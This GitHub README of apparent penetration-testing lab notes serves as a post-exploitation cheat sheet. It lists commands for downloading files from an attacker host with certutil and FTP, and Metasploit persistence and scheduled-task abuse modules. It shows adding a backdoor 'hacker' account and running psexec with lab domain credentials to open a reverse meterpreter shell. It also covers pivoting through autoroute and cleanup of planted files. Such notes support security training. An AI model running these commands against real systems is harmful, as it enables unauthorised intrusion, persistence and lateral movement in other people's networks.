Skip to content

Latest commit

 

History

History
115 lines (74 loc) · 1.45 KB

README.md

File metadata and controls

115 lines (74 loc) · 1.45 KB

Post Exploitation

  1. File Transfers
  2. Maintaining Access
  3. Pivoting
  4. Cleanup

File Transfers

  • Certutil:
certutil.exe -urlcache -f http://10.10.10.10/file.txt
  • HTTP:
python -m http.server

  • Browser (navigate directly to file)

  • FTP:

#in attacker machine
python -m pyftpdlib 21

#in victim machine
ftp 10.10.10.10

Maintaining Access

  • Persistence scripts:
#3 methods (noisy)
#in msfconsole
run persistence -h

exploit/windows/local/persistence

exploit/windows/local/registry_persistence
  • Scheduled tasks:
#2 methods
#in msfconsole
run scheduleme

run schtaskabuse
  • Add user:
#preferred method
net user hacker password123 /add

Pivoting

#example

#in attacker machine
msfconsole

use exploit/windows/smb/psexec

set rhosts 192.168.57.141

set smbdomain marvel.local

set smbpass Password1

set smbuser fcastle

set payload windows/x64/meterpreter/reverse_tcp

set lhost eth0

set target 2

run
#meterpreter shell

shell
#switches to windows shell

route print
#to check routing

ipconfig

arp -a
#get an idea of machines in network

#move back to meterpreter shell using Ctrl+C

run autoroute -s 10.10.10.0/24
#for pivoting

run autoroute -p

Cleanup

  • Remove executables, scripts, added files
  • Remove malware, rootkits and added user accounts
  • Set settings back to original configs